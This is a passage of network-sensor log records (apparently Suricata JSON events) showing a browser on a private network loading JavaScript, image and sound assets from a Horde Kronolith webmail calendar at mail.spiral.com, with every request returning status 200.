{"timestamp":"2020-02-29T00:26:20.005962+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.007455+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:26:20.008209+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.008619+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:26:20.011114+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.011607+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:26:20.011912+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:26:20.013306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":3}} {"timestamp":"2020-02-29T00:26:20.013612+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:26:20.029529+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.031054+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.036805+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:26:20.039089+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.039474+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:26:20.040435+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.040949+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:26:20.042181+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:26:20.043293+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.043781+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.044683+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:26:20.046209+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:26:20.044629+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.076688+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:26:20.077992+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.078718+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:26:20.077807+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.078388+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:26:20.079100+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.079595+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:26:20.079716+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:26:20.080724+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.082215+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.082235+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:26:20.082670+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":3}} {"timestamp":"2020-02-29T00:26:20.082847+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.083414+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:26:20.083613+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.083771+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.084509+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.085673+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:26:20.087589+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.086399+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.086773+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.087255+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 